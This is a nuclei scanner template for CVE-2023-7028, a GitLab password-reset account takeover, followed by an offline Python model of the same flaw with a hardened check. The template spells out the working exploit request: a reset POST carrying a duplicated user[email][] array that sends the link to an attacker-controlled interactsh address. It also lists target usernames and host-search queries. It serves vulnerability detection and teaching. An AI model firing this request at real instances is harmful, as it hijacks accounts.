CVE-2023-7028.yaml
83 lines (75 loc) · 2.84 KB

id: CVE-2023-7028

info:
  name: GitLab - Account Takeover via Password Reset
  author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
  impact: |
    Unauthenticated attackers can send password reset emails to unverified email addresses, enabling account takeover by intercepting the reset link sent to an attacker-controlled email.
  remediation: |
    Upgrade GitLab to version 16.1.6, 16.2.9, 16.3.7, 16.4.5, 16.5.6, 16.6.4, 16.7.2, or later depending on your version.
    Accounts with two-factor authentication enabled are not taken over by this issue alone, although their password can still be reset. On instances that ran a vulnerable version, check gitlab-rails/production_json.log for POST requests to /users/password whose email parameter is a JSON array of several addresses, and rotate credentials of any affected account.
  reference:
    - https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
    - https://x.com/rwincey/status/1745659710089437368?s=20
    - https://gitlab.com/gitlab-org/gitlab/-/issues/436084
    - https://hackerone.com/reports/2293343
    - https://github.com/V1lu0/CVE-2023-7028
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-7028
    cwe-id: CWE-640,CWE-284
    epss-score: 0.93543
    epss-percentile: 0.99829
    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: gitlab
    product: gitlab
    shodan-query:
      - title:"Gitlab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev,vkev,vuln

# Request 1 fetches the sign-in page only to harvest the Rails CSRF token;
# request 2 submits the password-reset form with user[email] as an array
# (victim address + attacker-controlled interactsh address). A hit on the
# interactsh SMTP listener means the reset link was mailed to the attacker.
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /users/password HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/users/password/new

        authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}

    payloads:
      username:
        - admin@example.com
        - admin@{{RDN}}
        - root@{{RDN}}
        - gitlab@{{RDN}}
        - git@{{RDN}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'smtp')

    extractors:
      - type: dsl
        dsl:
          - username
# digest: 490a00463044022100f869876bde5002d6c9a4d59722476553a4acb619f84ac3207caeb5631e6dddcc021f0ed5b813b374786bd961009b609ed2c9c7c481a3bf7099afe79b2d64761856:922c64590222798bb761d5b6d8e72950
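The following is an added example, not part of the nuclei template above and not GitLab's code. It models the two requests the template drives against a live target, but entirely offline: it extracts the `authenticity_token` from a constructed sign-in page with the template's own regex, builds the reset body that carries two `user[email][]` values, shows how a Rack/Rails-style nested-parameter parser turns that body into a list, and contrasts a handler that forwards whatever arrived with one that insists on a single string address. The HTML fragment, the small parser and the hardened check are constructed for this illustration; the check demonstrates the class of fix (reject a non-string email parameter), not GitLab's actual patch.

```python
import re
from typing import Optional
from urllib.parse import parse_qsl, urlencode

# Same pattern the template's first extractor uses to pull the CSRF token.
TOKEN_RE = re.compile(r'name="authenticity_token" value="([A-Za-z0-9_-]+)"')

# Constructed stand-in for the GET /users/sign_in response (not real GitLab output).
SIGN_IN_HTML = """<form class="new_user" action="/users/sign_in" method="post">
<input type="hidden" name="authenticity_token" value="Ab3dE_f9-G0hIjK" autocomplete="off" />
<input type="text" name="user[login]" />
</form>"""


def extract_token(html: str) -> Optional[str]:
    """Step 1: pull the authenticity_token the reset POST must carry."""
    m = TOKEN_RE.search(html)
    return m.group(1) if m else None


def build_reset_body(token: str, victim: str, attacker: str) -> str:
    """Step 2: the POST /users/password body with the duplicated array key.

    urlencode percent-encodes the brackets; the server decodes them back to
    exactly the user[email][]=...&user[email][]=... shape the template sends.
    """
    return urlencode([
        ("authenticity_token", token),
        ("user[email][]", victim),
        ("user[email][]", attacker),
    ])


def parse_nested_query(body: str) -> dict:
    """Minimal model of Rack/Rails nested-parameter parsing (constructed here,
    not Rack's code): a[b]=x -> {'a': {'b': 'x'}}, and the repeated
    a[b][]=x&a[b][]=y -> {'a': {'b': ['x', 'y']}}.
    """
    params: dict = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        head, _, tail = key.partition("[")
        # "user[email][]" -> ["user", "email", ""]; the empty name is the [] suffix.
        names = [head] + (re.findall(r"([^\[\]]*)\]", "[" + tail) if tail else [])
        node = params
        for i, name in enumerate(names):
            nxt = names[i + 1] if i + 1 < len(names) else None
            if nxt is None:
                if name == "":
                    node.append(value)  # trailing [] appends to the list
                else:
                    node[name] = value
            else:
                if name == "":
                    raise ValueError(f"unsupported nesting in {key!r}")
                node = node.setdefault(name, [] if nxt == "" else {})
    return params


def is_single_address(value) -> bool:
    """The check that closes the hole: exactly one string address, not a list."""
    return isinstance(value, str) and value.count("@") == 1


def resolve_reset_email_vulnerable(params: dict):
    """Models the pre-fix behaviour: whatever arrived under user[email] is
    passed on, so a two-element list reaches the lookup and mail step and the
    reset link goes to every address in it, including the attacker's."""
    return params.get("user", {}).get("email")


def resolve_reset_email_hardened(params: dict) -> str:
    """Post-fix shape (illustrative, not GitLab's actual patch): refuse
    anything that is not a single string address before any lookup."""
    email = resolve_reset_email_vulnerable(params)
    if not is_single_address(email):
        raise ValueError("user[email] must be a single address")
    return email


def simulate_exploit(victim: str, attacker: str) -> dict:
    """Drive steps 1 and 2 end to end against the constructed page and return
    what the server-side parser would see."""
    token = extract_token(SIGN_IN_HTML)
    if token is None:
        raise RuntimeError("no authenticity_token on sign-in page")
    return parse_nested_query(build_reset_body(token, victim, attacker))


if __name__ == "__main__":
    params = simulate_exploit("admin@example.com", "abc123@oob.example")
    print("server-side user[email] =", resolve_reset_email_vulnerable(params))
    try:
        resolve_reset_email_hardened(params)
    except ValueError as exc:
        print("hardened handler:", exc)
```

Against a real instance the only difference is that steps 1 and 2 become HTTP calls and the SMTP callback on the interactsh host is what the template's matcher keys on. Because a successful probe also mails a genuine reset link to the victim address, the check is intrusive, as the template's tags state; run it only against hosts you are authorised to test.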